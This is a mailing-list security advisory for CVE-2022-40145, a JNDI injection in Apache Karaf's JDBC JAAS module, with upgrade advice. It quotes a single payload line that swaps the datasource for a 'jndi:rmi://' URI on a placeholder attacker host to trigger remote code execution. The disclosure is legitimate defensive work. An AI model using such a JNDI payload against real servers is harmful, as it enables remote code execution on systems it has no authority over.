[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE-2022-40145: Apache Karaf: JDBC JAAS LDAP injection
From:       Jean-Baptiste_Onofré <jbonofre () apache ! org>
Date:       2022-12-21 15:53:26
Message-ID: 1e60267c-edf3-05bc-4e36-78ebe5889664 () apache ! org
[Download RAW message or body]

Severity: low

Description:

This vulnerable is about a potential code injection when an attacker has control of the target \
LDAP server using in the JDBC JNDI URL.

The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
 use InitialContext.lookup(jndiName) without filtering.
An user can modify  `options.put(JDBCUtils.DATASOURCE, "osgi:" +  DataSource.class.getName());` \
to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in \
JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 \
and 4.3.7.

We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

This issue is being tracked as KARAF-7568 

Credit:

Xun Bai <bbbbear68@gmail.com> (reporter)

References:

https://karaf.apache.org/security/cve-2022-40145.txt
https://karaf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2022-40145
https://issues.apache.org/jira/browse/KARAF-7568


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic